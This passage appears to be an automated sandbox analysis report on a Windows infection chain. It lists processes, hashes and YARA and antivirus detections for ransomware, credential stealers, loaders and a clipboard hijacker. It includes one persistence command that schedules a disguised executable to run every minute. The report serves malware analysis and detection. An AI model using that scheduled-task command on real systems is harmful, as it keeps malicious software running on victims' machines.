                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.490286812.0000000002380000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 71%, ReversingLabs

                                                                                                                            Target ID:28
                                                                                                                            Start time:10:42:52
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.488812684.000000000228A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                                            Target ID:29
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\A170.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\A170.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:809984 bytes
                                                                                                                            MD5 hash:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                                            Target ID:30
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
                                                                                                                            Imagebase:0x1000000
                                                                                                                            File size:9728 bytes
                                                                                                                            MD5 hash:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 88%, ReversingLabs

                                                                                                                            Target ID:31
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                                            Target ID:32
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:335360 bytes
                                                                                                                            MD5 hash:B888EFE68F257AA2335ED9CBD63C1343
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000020.00000002.519993720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.522623167.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                            Target ID:33
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                            Imagebase:0x12b0000
                                                                                                                            File size:185856 bytes
                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                            Target ID:34
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\913F.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\913F.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:809984 bytes
                                                                                                                            MD5 hash:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.482578416.0000000000887000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 71%, ReversingLabs

                                                                                                                            Target ID:35
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
                                                                                                                            Imagebase:0xe00000
                                                                                                                            File size:255488 bytes
                                                                                                                            MD5 hash:08240E71429B32855B418A4ACF0E38EC
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000023.00000003.612344653.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000023.00000002.618034875.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000002.618608332.0000000000E01000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000000.475540855.0000000000E01000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000023.00000003.520904242.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000023.00000003.520904242.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000023.00000002.618034875.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000023.00000002.618034875.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 88%, ReversingLabs

                                                                                                                            Target ID:36
                                                                                                                            Start time:10:42:53
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x310000
                                                                                                                            File size:625664 bytes
                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                            Target ID:37
                                                                                                                            Start time:10:42:54
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\913F.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\913F.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:809984 bytes
                                                                                                                            MD5 hash:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                                            Target ID:38
                                                                                                                            Start time:10:42:54
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\F4F7.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\F4F7.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:288768 bytes
                                                                                                                            MD5 hash:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.501652652.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.506871844.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                            Target ID:40
                                                                                                                            Start time:10:42:56
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:9728 bytes
                                                                                                                            MD5 hash:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 88%, ReversingLabs

                                                                                                                            Target ID:41
                                                                                                                            Start time:10:42:57
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\5DA0.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\5DA0.exe
                                                                                                                            Imagebase:0x9a0000
                                                                                                                            File size:5129728 bytes
                                                                                                                            MD5 hash:2AF03D52F9CF9E53DFFC1183B403E1B7
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Yara matches:
                                                                                                                            • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, Author: ditekSHen
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 70%, ReversingLabs

                                                                                                                            No disassembly